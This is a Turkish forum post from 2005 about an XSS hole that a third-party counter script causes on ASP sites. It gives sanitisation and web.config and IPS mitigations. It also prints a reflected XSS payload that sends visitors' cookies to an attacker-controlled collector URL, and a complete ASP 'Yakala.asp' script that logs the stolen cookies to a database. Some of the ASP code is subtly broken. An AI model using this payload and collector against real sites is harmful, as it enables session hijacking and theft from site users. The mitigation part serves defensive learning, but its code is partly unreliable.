|
|||||||
| Web Sitesi Çökertme Web sitesi çökertmekle ilgili her konuda bilgi bulabilirsiniz yada bildiklerinizi diğer üyelerle paylaşabilirsiniz. HER TÜRLÜ HACK VE HACK İSTEĞİ YASAKTIR! |
 |
|
|
Konu Araçları |
10.09.2005
|
#1 (permalink) |
|
Ziyaretçi
Mesajlar: n/a
|
Webservis Toplist Sayaç kodu ve Sebep Olduğu XSS Açıkları ve Korunma Yöntemleri
Webservis Toplist Sayaç kodu ve Sebep Olduğu XSS Açıkları ve Korunma Yöntemleri
WebServis Tarafından verilen ve Sitenize eklediğiniz; ------------------------------------ <script language="javascript"> var wuser="CWDoktoray", wbanner=11;</script> <script language="javascript" src= "a target=_blank href=http://www.webservis.gen">http://www.webservis.gen.tr/sayac.js"></script> ------------------------------------- Web Sayfanızda XSS açıkları kapatılmış Olsada, Webservis Sayac kodu sayesinde XSS Açığı Oluşuyor. Örnek XSS Açığı ile Ne yapılabilir : scriptlocation.href= target=_blank Yakala.asp?X= ’+escape./script www.PostAdres.com http:http://www.HedefSite.com/Haber.Asp?Recid=2><script>location.href= http://www.PostAdres.com/Yakala.asp?X=’+escape.</script> Saldırgan Url’nin sonuna "> Eklentisi ile Inputların sonlandırılmasını ve bundan sonra eklenen zararlı kodları Explorer’ın icra etmesini sağlar. Bu Link’e tıklayan kullanıcının Cookie’si Belirtilen Kaynağa Post edilir. XSS Açığını Engellemek için: Request ile alınan değerleri her zaman QueryString’de olsa Replace ile Aşağıdaki şekilde temizleyin Ve Request verilerini alırken mutlaka tam sayıya çevirin Recid = CInt(Trim(Server.HTMLEncode("Recid"))) Recid = Replace(Recid, "<" , "<") ’küçüktür Recid = Replace(Recid, ">" , ">") ’büyüktür Recid = Replace(Recide, "’" , "’") ’tek tırnak Recid = Replace(Recid, Chr(10) , "") ’Satır Başı Recid = Replace(Recid, Chr(34) , "") ’çift tırnak --------------------------------------------------- ASP.NET ’de web.config Dosyasında aşağıdaki değişikleri yaptığınızda " ’ " gibi karakterleri sistem kendisi kontrol eder. Bu Sayede hemen hemen hiçbir XSS ve SQL Enjeksiyon teknikleri Etkili olmaz <System.Web> <Pages validateRequest="True"></Pages> </System.Web> IPS Kullanıyor iseniz Yeni imza yaratıp Application Layer / HTTP / HTTP.URL_DECODED Protokolüne; ’ Tek Tırnak, " Çift Tırnak < Küçük > Büyük Karakterlerini ekleyerek XSS ve SQL Enjeksiyon Saldırılarını Direkt Engelleyebilirsiniz... ---------------------------------------------------------------------------------- Yakala.ASP’den Gelen Verileri yakalamak ve Veritabanına kaydetmek için Örnek Basit bir ASP Dosyası X = Request.QueryString("X") Yerine Veri URL’den geleceği için X = Request.ServerVariables("HTTP_REFERER") de Kullanabilirsiniz. "Yakala.mdb" adında bir database oluşturun "tblYakala" adında bir tablo ve "Sayfa" Adında (alan tipi Not) Oalcak şekilde Tasarlayın --------------------Yakala.Asp----------------------------------- <% Dim X X = Request.QueryString("X") %> <% Dim ConnString,bag ConnString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & server.mappath("Yakala.mdb") & ";" set bag = Server.CreateObject("ADODB.Connection") bag.Open ConnString %> <% Dim SQL,Rs Set Rs=Server.CreateObject("ADODB.Recordset") SQL="Select * From tblYakala" Rs.Open SQL,ConnString,1,3 End iF %> <% Rs.AddNew Rs("Sayfa")=X Rs.Update Rs.Close %> ---------------------------------------------------------------------------------- |
|
|
| Şu Anda Konuyu İnceleyen Aktif Kullanıcılar: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | |
|
|
Benzer Konular
|
||||
| Konu | Konuyu Başlatan | Forum | Cevaplar | Son Mesaj |
| Sayaç Kodu İçin Site | Altavista | Web Tasarım | 5 | 07.07.2008 15:30 |
| msn (korunma yöntemleri) | cRaZy MaX | Yazılım | 0 | 13.06.2007 11:19 |
| Bedava Asp Toplist Sistemi | W1L3D4 | Web Tasarım | 1 | 10.11.2006 16:14 |
| korunma fakat bu farklı bir korunma pc değil sağlık | BASHiBOSH | Korunma - Güvenlik | 2 | 08.02.2006 02:55 |
.jpg)
.jpg)
